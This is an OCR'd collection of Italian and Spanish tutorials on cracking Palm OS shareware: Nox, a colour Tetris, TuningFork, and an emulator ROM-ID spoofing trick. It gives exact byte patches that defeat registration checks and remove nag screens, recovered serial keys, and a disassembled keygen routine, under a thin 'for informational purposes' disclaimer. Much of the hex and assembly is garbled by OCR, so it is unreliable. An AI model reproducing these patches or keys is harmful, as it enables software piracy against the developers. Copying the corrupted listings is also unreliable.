00002c66 6666 BNE L235 --- e questi jump if not equal :-) 
00002c68 0c2800690001 CMPI $105!$69,1(A0) 
00002c6e 665e BNE 1235 

00002c70 0c28006c0002 CMPI +108!$6c,2(A0) 
00002076 6656 BNE 1235 

00002c78 0c28006c0003 CMPI +108!$6c,3(A0) 
00002c7e 664e BNE 1235 

00002c80 0c2800790004 CMPI $121!$79,4(A0) 
00002c86 6646 BNE 1235 

00002c88 0c2800370005 CMPI $55!$37,5(A0) 
00002c8e 663e BNE 1235 

00002c90 0c2800320006 CMPI $50!$32,6(A0) 
00002c96 6636 BNE 1235 

00002c98 0c2800380007 CMPI $56!$38,7(A0) 
00002c9e 662e BNE 1235 

00002ca0 0c2800390008 CMPI $57!$39,8(A0) 
00002ca6 6626 BNE 1235 

00002ca8 0c2800310009 CMPI $49!$31,9(A0) 
00002cae 66le BNE 1235 

00002cb0 0c280031000a CMPI $49!$31,10(A0) 
00002cb6 6616 BNE 1235 

00002cb8 4a28000b TST.B 11 (A0) 
00002cbc 6610 BNE 1235 


Bene, tutti questi compare confrontano un valore FISSO con un altro numero...ke siano le cifre da noi 
immesse ?? ....gia son proprio loro, vediamo con cosa vengon confrontate, con 77 69 6C 6C 79 37 32 
38 39 31 31 che in caratteri ascii risulta "willy7/28911" , proviamo a mettere questo codice nel box e 

TADAAAA...registrato :-) tutti e 25 i livelli son a nostra disposizione :-) e senza aver patchato nada :-) 


Job Done :-) 


Pincopall 
Note finali 


BHe il target era facilino ma il cracking sotto Palmare é agli inizi e dunque anke le protezioni lo sono 
per cui godiamocela finke dura :-P 

Un saluto a Pastorez che mi ha fatto sapere ke esisteva pure il cracking sotto PalmOS 

Ed un saluto a tutti ¡ membri della UIC e della TankCommandos CREW ( Hi bros :-)) nonké ai 
frequentatori di Htcrack-it e degli altri canali dove sono stato stó e staró :-) 

Bhe..nn puó mancare...1 saluto a BebOs, Raln, GiPOCO, C1CC10 e Vampire ke a quest'ora sono 
all'hackmeeting 2001 , manifestazione alla quale nn son potuto andare perké dovevo dare un esame 
(stamattina) e...beffa delle beffe..il prof. non e venuto e l'esame e spostato di molto..porkazza EVA! 


Disclaimer 


Vorrei ricordare che questo software vaa comprato e non rubato e o crakkato capito? Non mi ritengo 
responsabile per eventuali danni causati al vostro computer determinati dall'uso improprio di questo 
tutorial. Questo documento e stato scritto per invogliare il consumatore a registrare legalmente ¡ 
propri programmi, e NON a fargli fare uso del tantissimi file crack presenti in rete, infatti tale 
documento aiuta a comprendere lo sforzo immane che ogni singolo programmatore ha dovuto portare 


avanti per fornire ai rispettivi consumatori i migliori prodotti possibili. 


Noi reversiamo al solo scopo informativo e di miglioramento del linguaggio Assembly 
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PROTECCION: Name Hotsync / Key Unlock (6 dígitos) 


)NewBies (X)Intermedio ( )Avanzato ( ) Master 
Lo potete trovare su www.palmgear.com 
SouthDebugger, PRCedit, PilotDis. POSE Palm emulator 


INTRODUCCION 


Scarica il programma 
Tools usati 


PRC2BIN PILOTDIS HEX WORKSHOP POSE 


AL ATAQUE 


Notizie sul programma 


Questo programma é veramente utile..: ci si puó memorizzare nome utente e password di tutte le 
iscrizioni che abbiamo a giro per internet :-) , suddivise per genere. Molto utile per chi ha tante password 
da ricordare (come me..). Le password memorizzate sono protette da password... 


Essay Facendo partire fnox.prc nell'emulatore possiamo notare che la prima schermata che ci si 
presenta e questa! : 


LA REGISTRAZIONE!!! :) 
Ok. Tappando (da tap, cioé toccare con la penna del palmare) “Register Now” ci viene chiesto un seriale... 
Se ne inseriamo uno a caso, apparirá questa schermata: 


e poi entra nel prog. chiedendo la prima psw e funziona..tutto ...ma per 30 giorni.... 


Possiamo intervenire quindi sul controllo del codice... 
Disassembliamo fnox.prc con pilotdis e con prc2bin..... 


Guardando ¡ files che crea prc2bin troviamo in questo caso solamente il testo della form di registrazione 
con successo (tFRMO76c.bin).... (in teoria c'é anche quella di errore, cioé Talt04b0.bin, peró tanto e 
uguale...:-) ) 


Andando a cercare la stringa “76c" nel fnox.prc.s troviamo la chiamata alla resource di registrazione 
avvenuta, cioé : MOVE.W  +1900!$76c,-(A7) all' indirizzo 6118... 


000060fa 2448 MOVEA.L A0,A2 

000060fc 2f0a MOVE.L A2,-(A7) 
000060fe 3f2dedcó6 MOVE.W  -4666(A5),-(A7) 
00006102 4ebafb2c JSR L603 

00006106 1b040ed4d MOVE.B D0,-4787(A5) 
0000610a 4ebafde2 JSR L616 

0000610e 4fef000c LEA 12(A7),A7 
00006112 4a2ded4d L627 TST.B -4787(A5) 
00006116 670e BEO L628 

00006118 3f3c076c MOVE.W  +1900!$76c,-(A7) 
0000611c 4e4fal9%c sysTrapFrmPopupForm 
00006120 7601 MOVEO $1,D3 

00006122 544f ADDOQ.W  +42,A7 

00006124 6016 BRA L629 

00006126 42a7 L628 CLR.L -(A7) 

00006128 42a7 CLR.L -(A7) 

0000612a 41fa0066 LEA L633,A0 
0000612e 4850 PEA (A0) 

00006130 3f£3c04b0 MOVE.W  +1200!$4b0,-(A7) 
00006134 4e4fal94 sysTrapFrmCustomAlert 


00006138 4fef000e LEA 14(A47),A7 
0000613c 0c6bL06a90008 L629 CMP1.W +1705!$6a9,8(A3) 
Prima della chiamata viene fatto il controllo (TST.B , solitamente su d0, tranne che qui...:-) ) 


Provando a invertire o annullare il BEQ (con un NOP) per farlo andare alla funzione sottostante (la 

registrazione...) non otteniamo risultati, perché il nostro progr. Ci dice che l'abbiamo registrato ma poi se 
resettiamo il palm ci richiede la registrazione... (perché evidentemente ci sono altri controlli e il flusso del 
programma non passa dalla funzione di memorizzazione in memoria flash (solitamente sysTrapStrCopy). 


Quindi il dato contenuto nella parte di registro a5 (-4787(a5) ) e rilevante e viene utilizzato in seguito... 
quindi andiamo a studiare a monte come si comporta il progz. 


Ci sono due funzioni che vengono richiamate prima del controllo( JSR L616 e JSR 603). 


La L603 evidentemente restituisce d0 , lo mette nel registro che verrá poi controllato e viene passato 
(quest'ultimo registro) alla L616.... 


Dato che la Keyroutine restituisce il suo risultato in d0, dovrebbe essere la prima... (L603). 


Andando a vedere all'indirizzo L603 (5c30) troviamo la funzione interessata...se guardiamo in fondo 
(vicino alla RTS, cioé dove finisce la funzione) troviamo: 


00005daa 3004 MOVE.W  D4,D0O 
00005dac 80eefff2 DIVU.W -14(A6),D0O 
00005db0 3204 MOVE.W  D4,D1 
00005db2 d26efff2 ADD.W -14(A6),D1 
00005db6 a240 ADD.W DO,D1 
00005db8 3801 MOVE.W  D1,D4 
00005dba 5243 ADDO.W  +1,D3 
00005dbc b66effe8 L606 CMP .W -24(A6),D3 
00005dc0 65d8 BCS L605 
00005dc2 b86e0008 L607 CMP .W 8 (A6),D4 
00005dc6 57c0 SEO DO 
00005dc8 4400 NEG.B DO 
00005dca 4caf04f8 MOVEM.L (A7)+,D3-D7/A2 
00005dce dese UNLK A6 


00005dd0 4e75 RTS 
00005dd2 de6ffíc L608 LINK A6, +-4 


00005dd6 48e71f30 MOVEM.L D3-D7/A2/A3,-(A7) 


All'indirizzo 5dc6 ci sono un SEQ dO0 e NEG d0( il valore che restituirá la funzione prima di uscire 
all'indirizzo 5dd0 (RTS). Siccome viene negato d0 prima di uscire, il valore giusto deve essere 1 e non O 
(guardare le linee-guida se non capite). Quindi basterá sostituire (con HEX WORKSHOP) le due istruzioni 
(SEQ € NEG) con un Move.B +1, DO, cioé sostituire i byte 57c0 £ 4400 con 10 3C 00 01 (guardare gli Opcode) e la 


nostra funzione ci restituirá sempre 1, cioé codice sempre valido!! :-) 


Caricando di nuovo il progz. patchato nell'emulatore potete inserire un codice a caso e il progz. si registrerá per 
sempre... 


Versión NOX v2.2 


Archivo Original Sin Parchar v2.2 


00005198 38 01 MOVE.W D1, D4 

0000519A 52 43 ADD.W +$1, D3 

loc_519C: 

0000519C B6 6E FF E8 CMP.W SVAR_18, D3 

000051A0 65 D38 BCS.S LOC_517A 

loc_51A2: 

000051A2 B8 6E 00 08 CMP.W $8(A6), D4 

00005146 57 COSEQ.S DO  <---- Cambiar por MOVE.B ++$3C,DO "En Hexa es 10 3C" 
000051A8 44 00 NEG.B DO  <---- Cambiar por OR.B ++$1,D1 "En Hexa es 00 01" 
000051AA 4C DF 

000051AC 04 F38 DC.W +t04F8 

000051AE 4E 5E UNLK.L A6 

000051B0 4E 75 RTS 


Abrimos el editor hexadecimal favorito Ultraedit32 v10a Español y en modo hexadecimal abrimos el archivo 
Nox v2.2.prc y buscamos la cadena a parchar en este caso con Control+F y escribumos la cadena 57 C0 44 00 
vemos que nos aparecen varias coincidencias, entonces procedemos a vover a bucar pero escribiendo mas 
valores hexadecimales, entonces en la búsqueda ponemos la siguiente cadena B8 6É 00 08 57 CO 44 00 4C Df 
y al presionar buscar solo nos aparece una coincidencia, una ves estando en esa posición cambiamos 57 CO 44 
00 por 10 3C 00 01 guardamos el archivo con otro nombre por si algo falla por ejemplo guardar como Nox v2.2 
carcked.pre y guardamos, Esto lo podemos ver en las siguientes gráficas de abajo. 


Archivo Parchado v2.2. 
00005198 38 01 MOVE.W D1, D4 


0000519A 52 43 ADD.W +$1, D3 
loc_519C: 


0000519C B6 6E FF ES CMP.W SVAR_18, D3 

000051A0 65 D8 BCS.S LOC_517A 

loc_51A2: 

00005142 B8 6É 00 08 CMP.W $8(A6), D4 

00005146 10 3C MOVE.B +t$3C, DO <--- Intrucciones que se han cambiado 
00005148 00 01 OR.B +t$1,D1  <--- Intrucciones que se han cambiado 
O00051AA 4C DF 

000051AC 04 FS DC.W ++04F8 

000051AE 4E 5E UNLK.L A6 

000051B0 4E 75 RTS 


Al cargar el archivo en una Palm real parece que al registrar esta aplicación, y registrar cualquier numero (solo 
acepta 6 digitos) este lo ha validado, adelantamos el reloj y nada, todo bien , esperemos que al trabajar el 
programa no tenga otra rutina de comprobación que haga que el programa trabaje mal. 


Versión NOX v1.8 


Archivo Original Sin Parchar v1.8 


000041B4 32 03 MOVE.W D3, Dl 

000041B6 82 CO DIVU.W DO, Dl 

000041B8 10 05 MOVE.B D5, DO 

000041BA 48 80 

000041BC DO 43 ADD.W D3, DO 

000041BE DO 41 ADD.W D1, DO 

000041C0 36 00 MOVE.W DO, D3 

000041C2 52 44 ADD.W +$1, D4 

loc_41C4: 

000041C4 B8 46 CMP.W D6, D4 

000041C6 65 DE BCS.S LOC_41A6 

000041C8 B6 6E 00 08 CMP.W $8(A46), D3 

000041CC 57 CO SEQ.S DO  <---- Cambiar por MOVE.B +t$3C,DO "En Hexa es 10 3C" 
000041CE 44 00 NEG.B DO  <---- Cambiar por OR.B +t$1,D1 "En Hexa es 00 01" 
000041D0 4C DF 

000041D2 04 78 4E 5E 4E.. SUB.W ++$4E5E, $4E75 


Archivo Parchado v1.8. 
Desensamblando el archivo parchado vemos las siguientes instrucciones. 


00004146 70 00 MOVE.L +t$0, DO 
000041A8 30 04 MOVE.W D4, DO 
000041AA 1A 32 08 00 MOVE.B $0(A2, DO.W), DS 
000041AE 10 05 MOVE.B DS, DO 
000041B0 48 80 

000041B2 72 00 MOVE.L +*$0, Dl 
000041B4 32 03 MOVE.W D3, Dl 
000041B6 82 CO DIVU.W DO, Dl 
000041B8 1005 MOVE.B DS, DO 
000041BA 48 80 

000041BC DO 43 ADD.W D3, DO 
000041BE DO 41 ADD.W D1, DO 


000041C0 36 00 MOVE.W DO, D3 

000041C2 52 44 ADD.W +$1, D4 

loc_41C4: 

000041C4 B8 46 CMP.W D6, D4 

000041C6 65 DE BCS.S LOC_41A6 

000041C8 B6 6E 00 08 CMP.W $8(A6), D3 

000041CC 10 3C MOVE.B +$3C, DO  <--- Intrucciones que se han cambiado 
000041CE 00 01 OR.B +51, Dl <--- Intrucciones que se han cambiado 
000041D0 4C DF 

000041D2 04 78 4E SE 4E.. SUB.W +$4E5E, $4E75 


No sabemos hasta que futuras versiones podrán seguir utilizando esta rutina de comprobación , 
pero hay estaremos para seguir verificando el proceso de maduración del programa. 


By PaStOrE 


PastorelOfreemail.it 
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Descripcion: Trattiamo il mitico gioco sviluppato un po” in tutti ¡ sistemi(poteva mancare il Palm OS): 11 TETRIS ! 


Dificultad: (O) NewBies ( )Intermedio ( )Avanzato ( ) Master 


) 


Introduzione 


Questa versione del tetris e gia completa (full); l'unica differenza tra la versione registrata e 
questa e che qui all'inizio del gioco e quando si passa ad un altro livello, il nostro caro gioco ce lo 
ricorda di comprare il progz. ! :) (nagscreen) 


AL ATAQUE 


Tools usati 
PRC2Bin; 
PilotDis 
POSE (emulatore per Palm OS) 


Hex Workshop (o altro editor esadecimale) 


Lo potete trovare anche su : volftp.mondadori.com (cmq é incluso :P ) 


Essay 


Caricando il programma nell” emulatore e facendolo partire notiamo che appena iniziamo a 
giocare appare una schermata del genere: 


Questa e l'unica differenza con il prog. registrato! ... quindi bastera togliere questo 


nagscreen! 


OK! 


Prendiamo prc2bin e passiamogli il programma da esaminare... (prc2bin tetrisvcolor.prc e la 
sintassi sotto Dos) 


Verranno creati nella cartella un po' di files, a prima vista con nome senza significato....quelle sono 
le “funzioni” (resource) richiamate dentro il programma. 


Vanno studiati ¡ files con nome TaltXXXX.bin o TFRMXXXX.bin, aprendoli con blocco note.... 
Uno di questi (Talt0O3eb.bin) contiene (ma guarda un po'!) il testo della form di avvertimento! 


Disassembliamo il .prc con PilotDis (“pilotdis tetrisvcolor.prc” sotto Dos), che ci restituisce il file 
tetrisvcolor.prc.s (il listato assembler!). Lo apriamo e andiamo a cercare(con il “Trova” del blocco 
note) la stringa 3eb (la funzione da far saltare). 


Dopo alcune stringhe che non ci interessano troveremo questo listato: 


000007l4c 508f ADDO.L +8,A7 
000007l%e dese UNLK A6 
00000750 4e75 RTS 

00000752 4e560000 L93 LINK AG, +0 
00000756 610012f8 BSR L256 
0000075a 670a BEQ L94 
0000075c 3f3c03eb MOVE.W  +1003!$3eb,-(A7) 
00000760 4e4fal92 sysTrapFrmAlert 
00000764 5D48f ADDO.L  +2,A7 
00000766 7000 L94 MOVEOQ +0,DO 
00000768 102d01c0 MOVE.B  448(A5),DO 
0000076c 2f£00 MOVE.L DO,-(A7) 
0000076e 486d008e PEA 142(A5) 
00000772 4de4fa0c9 sysTrapStrIiToA 


00000776 508f ADDO.L  +8,A7 


00000778 3f3c001b MOVE.W  +27!$1b,-(A7) 


0000077c 3f3c008c MOVE.W  +140!$8c,-(A7) 

00000780 3f3c000a MOVE.W +10!S$a,-(A7) 

00000784 4860094 PEA 148(A5) 

“MOVE .W $+1003!$3eb,-(A7)” é in pratica 1'equivalente della Messagebox (per chi se ne 


intende! :P ) 


Notiamo che prima di questo troviamo un BSR (richiama una subroutine) e poi un “salta se uguale” alla label 94 (BEQ 
L94) 


A questo punto apriamo il .prc con Hex WorkShop e andiamo all'indirizzo 75a e cambiamo 
670a con 600a(cioe BEQ diventa BRA, salta sempre...) 


Salviamo, carichiamo il progz. nuovamente sull'emulatore e possiamo notare che avviando 
il gioco il nagscreen non viene + visualizzato! :) 


byez 


byez 


by 


pastorkE 
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Visualiza la Frecuencia del microprocesador en Pantalla 


(X)NewBies ( )Intermedio ( )Avanzado ( )Master ( )Gúru 


http://www. arcosoft.com 


PalmDemon v0.27, PRCExplorer v1.0, POSE Palm emulator, UltraEdit 12 Editor Hexa 


INTRODUCCION 
PASO I INTUITIVAMENTE METODO LAMMER 


Sencillo programa de 6 Kb para visualizar la frecuencia de microprocesador en modo shareware, Tal parece ser 
cierto que programa de 6Kb protección pequeña, dicho de otra manera que programa pequeño protección pequeña, 
si quieres adelantarte puedes ir buscando el serial directamente, solo necesitas el ultraedit 12 Editor hexadecimal 
una vez abierto revisamos todo el archivo y encontramos un número sospechoso puesto que es un número largo da 
la facha de ser un serial único . 


ODODOBSOR: 18 "?E-00Ol- FF. “79 -4C "DF 010-380 4E “SE 4E “TS BE SS 2 llo yLM. su*Nuis 
——/O0000ba0h: 68 6F “77? 43 6F 64 65 44 692 61 6€ 6F 67? 00 00 0€ ; hovCodeDialog... 


690592 441 O 


Ma | O0000bcOh: 48 E? 10 30 24 6 00 08 76 00 0C 52 00 09 66 14 ; Hpb.0O9$n..v..R..f. 


Que tal si lo anotamos y vemos que pasa con el 6905924416 parece ser que es el numero de serie es valido pero al 
presionar aceptar en la ventana de registro no nos dice si es correcto ni muestra ventana de error, cerramos la 
aplicación y abrimos nuevamente el programa víctima, parece que ya no muestra la ventana de registro, 
adelantamos el reloj de la Palm ó el emulador y nada todo esta correcto, Bien ahora parcharemos el programa 
haciendo que la propia ventana de registro sea la misma que nos diga con que serial debemos de registrar para eso 
de los que padecen AsJaimer y se les olvidan las cosas, recuerda que deben ser los mismos bits los que debemos de 
parchar ni mas ni menos, Usaremos nuestro buen amigo el UltraEdit 32 Para Windows XP. 


[Registration | 


Thank you for evaluating this 
software. The registered version 
removwes this reminder. 
Registration is simple and on-line. 
Wisit www.arcosoft.corn 


La ventana de arriba nos muestra el texto que buscaremos con el ultraedit y damos en 


ODOOO9aoh: 
ODOOOSLOk: 
ODOOOS9cOoh: 
0000090: 
ODODO9e0h: 
[| 000DO9fO0h: 
DDDODaDOh: 
OO00ODalOk: 
0000DazOkh: 
DODODa3Oh: 


CAMA MAA a AÑ 


DODODSY30n : 
DOOOO9aoh: 
DOOOOOS-HOh: 
OOO0OOScoh: 
OOODOSdoh: 
o0o00OSeoh: 
DOOOOSfTOh: 
OODODadOoh: 
00000alOh: 
00000azOh: 
Ho | 00000a30h: 


00000240kh: 
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Al Abrir el programa en el emulador nos aparece: 


[Registration | 


Registered with this key this 
software. Key:6905924416 


Enjoy : 
Wisit www.arcosoft.corn 


Enter Code 
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Registramos con el número 6905924416 y Parece que al introducir el serial nos lo ha validado. Este Procedimiento 
ha sido echo a lo Lammer novato, pero lo que necesitamos es hacer bien las cosas y aprender más de la cuenta. 


AL ATAQUE 
PASO 2 BUSCANDO EN EL CODIGO MUERTO 


una vez instalada la aplicaion y habiendo abierto la misma nos aparece un contador de 10 segundos para registrarnos si 
en ese lapso no nos registramos nos continua a modo de version de prueba. 


[Registration | 


Thank you for evaluating this 
software. The registered version 
removes this reminder. 
Registration is simple and on-line. 
Wisit www.arcosoft.corn 


E 


Presionamos enter code y paramos en: 


[Registration | 


Thank you for evaluating this 
software. The registered version 
removwes this reminder. 
Registration is simple and on-line. 
Wisit www.arcosoft.corn 


Enter Code 


benitosaurid] 


Al presionar cualquier serial vemos que aparece una ventana de error 


[Registration | 


Thank you for evaluating this 
software. The registered version 
removes this rerninder. 
Registration is simple and on-line. 
Wisit www.arcosoft.corm 


Registration 


A Invalid code 


Manos a la obra: Abrimos el PrcExplorer y buscamos la ventana de ese error ,el cual muestra que es la Talt 
(1100x044c) Anotamos en una papel de reciclaje 044c , Ahora desensamblamos el archivo víctima con PalmDemon y 
abrimos el código presionando en la carpeta de la izquierda en CODE (SEG : 0x01), despues presionamos el boton (Res 
x-refs) el cual nos mostrara la alerta y formularios llamados,. Clickamos en la ventana Alert:00000B86: Registration y 
en el desensamblado nos manda en: 


palmdeMON v0.27 (09/09/2002) [D:ATuningFork 1.1 - Frecuencia de Pantalla - Trial. pre 
File Tools Help 


00000884 60 DA BRA.S 
O0000886 3F 3 HOVE.H 450440, (A?) 
to Alert [Registrat ion) 
Code [Segment 01] AF 4 
Show Alert XRefs 3 ADO. 


DODOOZ2FA: Invalid frequency 
00000596: About Tuning Fork 
00000472: Tuning Fork 
DOOODAFA: Enter Code 
D00000B7?A4: Tuning Fork 
Registration 
D00000D64: Tuning Fork 
00000D70: Registration 


HOVE.E 
DC.H *FF?9 


HOVE.B — $4E5E, D6 
RTS 


DIILILILILILIA 


ODO0008B6 
Registration 13] 
A Invalid code 


DOOO0BBA 00 00 OR.B 50, DO 


00000AFE 4E 4F Al 6F SysTrap FrmInitForm 
00000B02 24 48 MOVE.L AO, A2 

00000B04 3F 3C 05 79 MOVE.W ++$0579, -(A7) 
00000B08 2F0A MOVELL A2, -(A7) 

00000BOA 4E 4F Al 80 SysTrap FrmGetObjectIndex 
00000BOE 5C 4F ADD.W +$6, A7 

00000B 10 3F 00 MOVE.W DO, -(A7) 

00000B12 2F0A MOVELL A2, -(A7) 

00000B 14 4E 4F Al 79 SysTrap FrmSetFocus 
00000B18 2F0A MOVELL A2, -(A7) 

00000B1A 4E 4F Al 93 SysTrap FrmDoDialog 
00000B1E 38 00 MOVE.W DO, D4 

00000B20 3F 3C 05 79 MOVE.W ++$0579, -(A7) 
00000B24 2F0A MOVELL A2, -(A7) 

00000B26 4E 4F Al 80 SysTrap FrmGetObjectIndex 
00000B2A 5C 4F ADD.W +t$6, A7 

00000B2C 3F 00 MOVE.W DO, -(A7) 

00000B2E 2F 0A MOVELL A2, -(A7) 

00000B30 4E 4F Al 83 SysTrap FrmGetObjectPtr 
00000B34 28 48 MOVE.L AO, A4 

00000B36 2F 0C MOVE.L A4, -(A7) 

00000B38 4E 4F Al 39 SysTrap FldGetTextPtr 
00000B3C 26 48 MOVE.L AO, A3 


00000B3E 20 0B MOVE.L A3, DO 

00000B40 4F EF 00 16 LEA.L $16(A7), A7 
00000B44 67 10 BEQ.S LOC_B56 

00000B46 2F 05 MOVE.L DS, -(A7) 

00000B48 2F 0B MOVELL A3, -(A7) 
00000B4A 4E 4F AO C8 SysTrap StrCompare 
00000B4E 4A 40 TST.W DO 

00000B50 50 4F ADD.W +$8, A7 

00000B52 66 02 BNE.S LOC_B56 

00000B54 76 01 MOVE.L +$1, D3 

loc_B56: 

00000B56 2F OA MOVELL A2, -(A7) 
00000B58 4E 4F A1 70 SysTrap FrmDeleteForm 
00000B5C 0C 44 05 7B CMP.W +t$057B, D4 
00000B60 58 4F ADD.W +$$4, A7 

00000B62 66 08 BNE.S LOC_B6C 

00000B64 1B 7C 00 01 MOVE.B +$$7C, $1(AS5) 
00000B68 FF 79 DC.W +FF79 

00000B6A 60 2A BRA.S LOC_B96 

loc_B6C: 

00000B6EC 4A 03 TST.B D3 

00000B6E 67 16 BEQ.S LOC_B86 

00000B70 42 2D FF 77 CLR.B VAR_89 
00000B74 1B 7C 00 01 MOVE.B +t$7C, $1(AS5) 
00000B78 FF 76 DC.W +FF76 

00000B7A 3F 3C 04 BO MOVE.W ++$04BO, -(A7) 


X-ref to Form (Tuning Fork) 


00000B7E 4E 4F Al 9B SysTrap FrmGotoForm 

00000B82 54 4F ADD.W ++$2, A7 

00000B84 60 0A BRA.S LOC_B90 

loc_B86: 

00000B86 3F 3C 04 4C MOVE.W +t$044C,-(A7) (Aqui muestra la ventana de Mal chico) 


X-ref to Alert (Registration) 


00000B8A 4E 4F Al 92 SysTrap FrmAlert 
00000B8E 54 4F ADD.W +$2, A7 

loc_B90: 

00000B90 1B 7C 00 01 MOVE.B +t$7C, $1(AS5) 
00000B94 FF 79 DC.W +FF79 

loc_B96: 

00000B96 4C DF 

00000B98 1C 38 4E 5E MOVE.B $4E5E, D6 
00000B9C 4E 75 RTS 

00000B9E 8E 53 OR.W (A3), D7 

00000BAO 68 6F BVC.S $C11 

00000BA2 77 43 DC.W ++7743 

00000BA4 6F 64 BLE.S LOC_COA 
00000BAG6 65 44 BCS.S $BEC 

00000BAS8 69 61 BVS.S $C0B 

00000BAA 6C 6F BGE.S $C1B 

00000BAC 67 00 00 0C BEQ LOC_BBA 


(Aqui hay parte del serial $30353932 en hexa y en decimal serán los dígitos 0592 ) 
00000BBO 36 39 30 35 39.. MOVE.W $30353932, D3 


00000BB6 34 34 31 36 MOVE.W $36(A4, D3.W), D2 
loc_BBA: 
00000BBA 00 00 OR.B +t$0, DO 
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INTRODUCCION 
Análisis Tutoriales Trucos y consejos Manuales 


AL ATAQUE 
¿cómo ahorrar batería? (1785) 
Sincroniza el POSE con el hotsync (3134) 
POSE (emulador Palm OS) ¿qué es?, ¿cómo funciona?. (5344) 
Conexión a internet kit Palm Mobile Internet (2075) 
Conexión a internet mediante un movil (4832) 


Conexión de la Palm a un modem mediante Hotsync (1592) 
Conexión a internet mediante Hotsync y PC (4672) 


Conexión a internet mediante un modem (1657) 


¿Cómo cambiar el OS de la Palm? - Modo Avanzado (2785) 
¿Cómo cambiar el OS de la Palm? - Modo estandar (3783) 


¿Cómo instalar un hack y configurarlo? (1789) 


Sincronizar la Palm con Linux (410) 
Conexión a internet mediante un PC con Linux (622) 


Conexion a internet mediante bluetooth y el PC (1779) 


Sincronizando vía Bluetooth (680) 
Astronomía y Palm ( Parte 1 ) (1368) 
HTML en la Palm-a de tu mano (1025) 


Conexión a internet por base con softick (686) 


Hollywood en la palma de tu mano (2918) 
El caso de los bytes perdidos. (447) 


caracteres en el teclado de la serie N de clie (37) 
Crear e instalar fondos para Zlauncher (1957) 
Actualizar Os (360) 

Como acelerar tu palm (322) 

MMC vs SD: cuales son las diferencias? (260) 
Discar con tu Pda (156) 
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Descripción: Lista de comandos Debuffer 1.2 


(O) NewBies ( )Intermedio ( )Avanzado ( )Master ( )Gúru 


X ) 


Herramientas: SouthDebugger, PRCedit, PilotDis. POSE Palm emulador, UltraEdit-32, PalmDemon 0.27 


Palm CRACKER: The Guerrero Minogue FECHA: W/31/02/2005 


INTRODUCCION 
Debuffer 1.2 Tips 


AL ATAQUE 
Hacer que El Emulador use nuestro ROM ID de nuestra Palm Real. 


¿Si tenemos un blanco con una rutina que calcula el numero de serie basandose en la ROM ID, entonces tendremos 
un problema para encontrar el serial con el Debuffer para nuestro Dispositivo Palm. 

hmmm ... cómo podemos determinar el ROM ID en el emulador POSE? 

Echemos un vistazo a las definiciones PalmOS API ... 


Guía de referencia PalmOS 


Algunos dispositivos Palm, a partir de la Palm !!l, Tienen un número de serie de 12 dígitos que identifica el dispositivo 
excepcionalmente. Sin embargo no todos los dispositivos PalmOS (Handspring, llle and m100) contienen chips de 
memoria Flash ROM. 

Contienen lo que es conocido como chips máscara ROM, que no tiene este número de serie y no es ampliable. 

El número de serie se mantiene en un texto desplegable en el Buffer de la memoria con terminaciones invalidas. 
El usuario puede mirar el número de serie en Application Launcher. 

(La versión pop-up del Launcher no ostenta el número de serie.) 

La Application Launcher también despliega al usuario un dígito del checksum que podemos usar para validar una 
entrada de número de serie introducida por el usuario. 

Primero miramos en el emulador POSE con Application Launcher nuestro ROM ID POSE. 

Sobre el Pose....El Número ROM ID será exhibido... ! ¿Qué asi es como se muestra en un dispositivo real Palm? 


d 


- Palmille- 


| Palmillc 
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Palm 0S5 software uv. 3.5.0 Palma 0S% software y. 3.5.0 


Address - ' Address 
Buttons 3 Buttons 
Calc e ; Calc 
Connection 3 | Connection 
Date Book -3 | Date Book 
Digitizer 3. Digitizer 
Expense 3 Expense 


Ok, he encontrado una utilidad fresca SetNewSerial que debería hacer esto para nosotros. 

Lo pudemos descargar de http://klyatskin.da.ru 

pero primero debemos edita el SetNewsSerial.prc e insertar nuestro ROM ID del dispositivo real, así es como el 
emulador POSE usará nuestro ROM ID de nuestra Palm Real. 

Usamos un Editor Hexadecimal y abrimos el archivo SetNewSerial.pre 


NS 


00000130h: BO 
00000140h. 68 


E A A E] 


BO B3 


o e 
22223 number 
here —> MASA 


BO 
72 e 


Td 


6E 62 
6F 74 2E 53 


00000160h: 45 49 


ananans 2. Mn nar 


DB 


VUUDOUOULIUMI. DU DU DU DU DJ UL UA DI OL 3 


Du 
00000140h: 68 72 65 20 2D 3E B3 E 


TEFHAZ 


: EDITOR*U00000000 
MAD. ARRRARRRZA 


00000160k: 
nanand 21h - 


4F 52 B3 DB DB DE DB > 
nn na En Fa Fa Fa Fa Fa Fa Fa Fa Fa - 


Después guardamos la modificación de SetNewSerial como mySetNewSerial.pre 

Entonces instalamos el HackMaster y el archivo mySetNewSerial.prc en el emulador 

Despues habilitamos el SetNewSerial en el POSE, Verificamos el ROM ID en Application Launcher... 
Y esto es lo que encontramos. 


C Palmille. 


Palran 08% software uv. 3.5.0 
Address 
Buttons 
Calc 
Connection 
Date Book 
Digitizer 
Expense 


Bravo ... ahora estamos listos para una sesión Debug: 


Depurando la sesión 


Usamos a nuestro Target SafelnHand como muestra.. 
OK, colocamos un Break en el Debuffer con OPCODE 4E48 justamente debajo del StrCompare e iniciamos al Debuffer.. 


Keygen Routine manual segura "SafelnHand" 


000000be 
000000c2 
000000c6 
000000ca 
000000cc 
000000ce 
000000d2 
000000d2 
000000d4 
000000d6 
000000d8 
000000da 
000000dc 
000000de 
000000e2 
000000e4 
000000e6 
000000es 
000000ea 


4e560000 L8 
48e71e20 

246e000a 

7800 

2f0a 

4e4fa0c7 


3c00 
7600 
584f 
601c 
7000 L9a 
3003 | 
1a320800 | 
702a | 
9044 | 
d043 | 
1205 | 
4881 | 


LINK A6,+t0 

MOVEM.L D3-D6/A2,-(A7) 
MOVEALL 10(A6),A2 
MOVEQO +0,D4 
MOVE.L A2,-(A7) 
TRAP +15 

DC.W sysTrapStrLen 
MOVE.W DO0,D6 
MOVEQO +f0,D3 
ADDQ.W +4,A7 

BRA L10 

MOVEQO +0,DO 
MOVE.W D3,D0 
MOVE.B 0(A2,D0.L),D5 
MOVEQO +142,D0 

SUB.W D4,D0 

ADD.W D3,D0 
MOVE.B D5,D1 

EXT.W Dl 


000000ec  0641000d | ADDIW ++13!$d,D1 
000000f0.  c2c0 | MULU.W DO,D1 

000000f2 3801 | MOVE.W D1,D4 

000000f4 5243 | ADDQ.W +1,D3 

000000f6  b646 L10 CMP.W D6,D3 

000000f8 6580 ———————— oo--- BCS L9 

000000fa  b86e0008 CMP.W 8(A6),D4 <-compare Key with typed value 
000000fe  57c0 SEQ DO  <- break here! 
00000100 4400 NEG.B DO 

00000102  4cdf0478 MOVEM.L (A7)+,D3-D6/A2 
00000106  4e5e UNLK A6 

00000108  4e75 RTS 

0000010a 87 DC.B ++135 

0000010b  4576616c4b6579 'EvalKey' 


